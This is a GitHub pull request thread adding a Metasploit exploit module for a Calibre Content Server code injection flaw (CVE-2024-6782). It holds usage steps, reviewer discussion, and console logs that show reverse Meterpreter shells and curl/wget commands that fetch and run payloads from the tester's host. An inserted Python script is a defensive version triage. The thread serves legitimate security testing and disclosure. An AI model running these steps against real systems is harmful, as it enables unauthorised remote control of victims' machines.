
Calibre Python Code Injection (CVE-2024-6782) #19357

Merged (3 commits), Aug 7, 2024

Conversation

@h4x-x0r (Contributor) commented Aug 2, 2024

This module exploits a Python code injection vulnerability in the Content Server component of Calibre v6.9.0 - v7.14.0 (CVE-2024-6782). Once enabled (disabled by default), it will listen in its default configuration on all network interfaces on TCP port 8080 for incoming traffic, and does not require any authentication. The injected payload will get executed in the same context under which Calibre is being executed.

Verification Steps

  1. Install Calibre from here.
  2. Start Calibre and click Connect/share > Start Content server
  3. Run Metasploit:
  • Start msfconsole and enter the following commands
  • use exploit/multi/misc/calibre_exec
  • set RHOSTS <IP>
  • set LHOST <IP>
  • exploit

You should get a meterpreter session running in the same context as the Calibre application.

msf6 exploit(multi/misc/calibre_exec) > exploit 

[*] Started reverse TCP handler on 192.168.137.190:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Sending payload...
[*] Sending stage (201798 bytes) to 192.168.137.194
[*] Meterpreter session 1 opened (192.168.137.190:4444 -> 192.168.137.194:50346) at 2024-08-01 23:28:16 -0400
[*] Exploit finished, check thy shell.

meterpreter > sysinfo
Computer        : DESKTOP-foo
OS              : Windows 10 (10.0 Build 19045).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows

meterpreter > shell
Process 6084 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19045.4529]
(c) Microsoft Corporation. All rights reserved.

C:\Program Files\Calibre2>whoami
whoami
desktop-foo\admin

Successfully tested on

Windows:

  • Calibre v7.14 on Windows 10 22H2
  • Calibre v7.0 on Windows 10 22H2
  • Calibre v6.29 on Windows 10 22H2
  • Calibre v6.9 on Windows 10 22H2

Linux:

  • Calibre v7.14 on Ubuntu 24.04 LTS
  • Calibre v7.0 on Ubuntu 24.04 LTS
  • Calibre v6.29 on Ubuntu 24.04 LTS
  • Calibre v6.9 on Ubuntu 24.04 LTS

New Exploit Module for Calibre Python Code Injection (CVE-2024-6782)
@dledda-r7 dledda-r7 self-assigned this Aug 2, 2024
Updated to work with v7.15 too.
@h4x-x0r (Contributor Author) commented Aug 2, 2024

Added support for v7.15. The original advisory only states that versions 6.9.0 ~ 7.14.0 are affected, but from the official changelog, we can see that a fix was only added with v7.16.
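A defender-side triage of inventory version strings against the range discussed in this thread, added here as an example and not code from the module or from Calibre; the inventory data is constructed, and the affected range (6.9.0 up to but excluding 7.16) is an assumption drawn from the comment above.

```python
# Added example (not the Metasploit module's code, not Calibre's code):
# triage Calibre versions from an asset inventory against CVE-2024-6782.
# Affected range follows the thread: the advisory says 6.9.0 - 7.14.0,
# but the changelog shows the fix landing in 7.16, so 7.15.x counts too.
# The inventory dict below is constructed sample data (assumption).
from __future__ import annotations

FIRST_AFFECTED = (6, 9, 0)   # first vulnerable release
FIRST_FIXED = (7, 16, 0)     # first release carrying the fix


def parse_version(text: str) -> tuple[int, int, int]:
    """Normalise '7.14.0', 'v7.15' or '6.9' into a comparable 3-tuple."""
    parts = text.strip().lstrip("vV").split(".")
    if not 1 <= len(parts) <= 3 or not all(p.isdigit() for p in parts):
        raise ValueError(f"unrecognised Calibre version: {text!r}")
    nums = [int(p) for p in parts] + [0] * (3 - len(parts))
    return nums[0], nums[1], nums[2]


def is_affected(text: str) -> bool:
    """True when FIRST_AFFECTED <= version < FIRST_FIXED."""
    return FIRST_AFFECTED <= parse_version(text) < FIRST_FIXED


def triage(inventory: dict[str, str]) -> dict[str, list[str]]:
    """Bucket hosts as 'patch' (affected), 'ok', or 'unknown' (unparseable)."""
    buckets: dict[str, list[str]] = {"patch": [], "ok": [], "unknown": []}
    for host, version in inventory.items():
        try:
            buckets["patch" if is_affected(version) else "ok"].append(host)
        except ValueError:
            buckets["unknown"].append(host)
    return buckets


# Constructed sample inventory: hostname -> Calibre version as recorded by
# the host's package manager or installer record.
SAMPLE_INVENTORY = {
    "lib-01": "7.14.0",   # inside the advisory's range
    "lib-02": "v7.15",    # past the advisory range, still unfixed
    "lib-03": "7.16.0",   # first fixed release
    "lib-04": "6.8.1",    # predates the vulnerable code
    "lib-05": "n/a",      # version not recorded
}

if __name__ == "__main__":
    for bucket, hosts in triage(SAMPLE_INVENTORY).items():
        print(f"{bucket:>7}: {', '.join(hosts) or '-'}")
```

Hosts in the patch bucket also warrant checking whether the Content Server is enabled, since the thread notes it is off by default but listens unauthenticated on TCP 8080 once turned on.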

@dledda-r7 (Contributor) left a comment:

Hello @h4x-x0r, Thanks for your PR!
I've left some comments for you to evaluate.

Testing

Calibre 7.14.0 - Windows Server 2019
msf6 exploit(multi/misc/calibre_exec) > exploit

[*] Started reverse TCP handler on 192.168.136.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Sending payload...
[*] Sending stage (228422 bytes) to 192.168.136.130
[*] Meterpreter session 1 opened (192.168.136.128:4444 -> 192.168.136.130:49723) at 2024-08-02 10:05:10 -0400

[*] Exploit finished, check thy shell.

meterpreter > 
meterpreter > sysinfo
Computer        : WIN-JR5HP085VV3
OS              : Windows Server 2019 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows

modules/exploits/multi/misc/calibre_exec.rb, review comment on lines 131 to 133 (outdated):
if res && res.code == 200
print_good('Command successfully executed, check your shell.')
end
Contributor:

I was thinking here to have an else branch to notify the user something went wrong.

Contributor Author:

While testing different payloads, such as a simple calc execution, I did receive a 200 response. With payloads that take a little longer, such as the meterpreter ones, no response is received by the time the payload has executed and a shell has already been established, so I wasn't sure if an else branch is required.

Contributor Author:

I've added a check in case a 400 response is returned - based on my tests, this seems to be the most common scenario other than a 200 response.

@dledda-r7 dledda-r7 removed their assignment Aug 2, 2024
@bwatters-r7 bwatters-r7 self-assigned this Aug 2, 2024
Updated code for version detection and exploit invocation
@Admin9961 commented Aug 3, 2024

Suggestion feature: add self-detection method for OS discovery

@h4x-x0r (Contributor Author) commented Aug 3, 2024

> Suggestion feature: add self-detection method for OS discovery

Diffing the HTTP responses of a Calibre Content Server running on Windows and Linux, I didn't notice a specific string or similar that would indicate the OS that is being used. Is there a specific API or endpoint that can be queried to retrieve this information?

Otherwise I'd just suggest doing the typical enumeration with nmap etc., and then setting the target manually with set target.

@bwatters-r7 (Contributor):

msf6 exploit(multi/misc/calibre_exec) > show options

Module options (exploit/multi/misc/calibre_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   10.5.132.118     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    8080             yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (cmd/windows/http/x64/meterpreter_reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   EXTENSIONS                           no        Comma-separate list of extensions to load
   EXTINIT                              no        Initialization strings for extensions
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      ouIWFbZKZ        no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows_Fetch



View the full module info with the info, or info -d command.

msf6 exploit(multi/misc/calibre_exec) > run

[*] Command to run on remote host: curl -so %TEMP%\GpywZYeWIU.exe http://10.5.135.201:8080/h8r3u5VU3v-qeqUW3_anLw & start /B %TEMP%\GpywZYeWIU.exe
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /h8r3u5VU3v-qeqUW3_anLw
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Version retrieved: 7.14.0
[+] The target appears to be vulnerable.
[*] Sending payload...
[*] Client 10.5.132.118 requested /h8r3u5VU3v-qeqUW3_anLw
[*] Sending payload to 10.5.132.118 (curl/7.83.1)
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.132.118:58790) at 2024-08-06 19:36:18 -0500
[*] Exploit finished, check thy shell.

meterpreter > sysinfo
Computer        : DESKTOP-V413087
OS              : Windows 10 (10.0 Build 19045).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-V413087\msfconsole

@bwatters-r7 bwatters-r7 closed this Aug 7, 2024
@bwatters-r7 bwatters-r7 reopened this Aug 7, 2024
@bwatters-r7 (Contributor):

Sorry about that; hit the wrong button!

@bwatters-r7 (Contributor):

msf6 exploit(multi/misc/calibre_exec) > show options

Module options (exploit/multi/misc/calibre_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   10.5.134.129     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    8080             yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       WGET             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      zsmvwWCNdA       no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces
   LHOST               10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux Command



View the full module info with the info, or info -d command.

msf6 exploit(multi/misc/calibre_exec) > run

[*] Command to run on remote host: wget -qO ./CKbMsLDGUR http://10.5.135.201:8080/RByzlSnTzclKDpvXskXIrg; chmod +x ./CKbMsLDGUR; ./CKbMsLDGUR &
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /RByzlSnTzclKDpvXskXIrg
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Version retrieved: 7.14.0
[+] The target appears to be vulnerable.
[*] Sending payload...
[*] Client 10.5.134.129 requested /RByzlSnTzclKDpvXskXIrg
[*] Sending payload to 10.5.134.129 (Wget/1.21.2)
[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.134.129:39534) at 2024-08-07 16:31:47 -0500
[*] Exploit finished, check thy shell.

meterpreter > sysinfo
Computer     : 10.5.134.129
OS           : Ubuntu 22.04 (Linux 5.15.0-43-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: msfuser
meterpreter > 

@bwatters-r7 bwatters-r7 merged commit baca872 into rapid7:master Aug 7, 2024
75 checks passed
@bwatters-r7 (Contributor):

Release Notes

Adds a module targeting CVE-2024-6782, an unauthenticated Python code injection vulnerability in the Content Server component of Calibre v6.9.0 - v7.14.0. Once enabled (disabled by default), it will listen in its default configuration on all network interfaces on TCP port 8080 for incoming traffic. The injected payload will get executed in the same context under which Calibre is being executed.

@cgranleese-r7 cgranleese-r7 added module rn-modules release notes for new or majorly enhanced modules labels Aug 9, 2024
@h4x-x0r (Contributor Author) commented Aug 19, 2024

Great, thank you!

Not sure if there's any relevance to the labels, but perhaps the docs label could be added too?
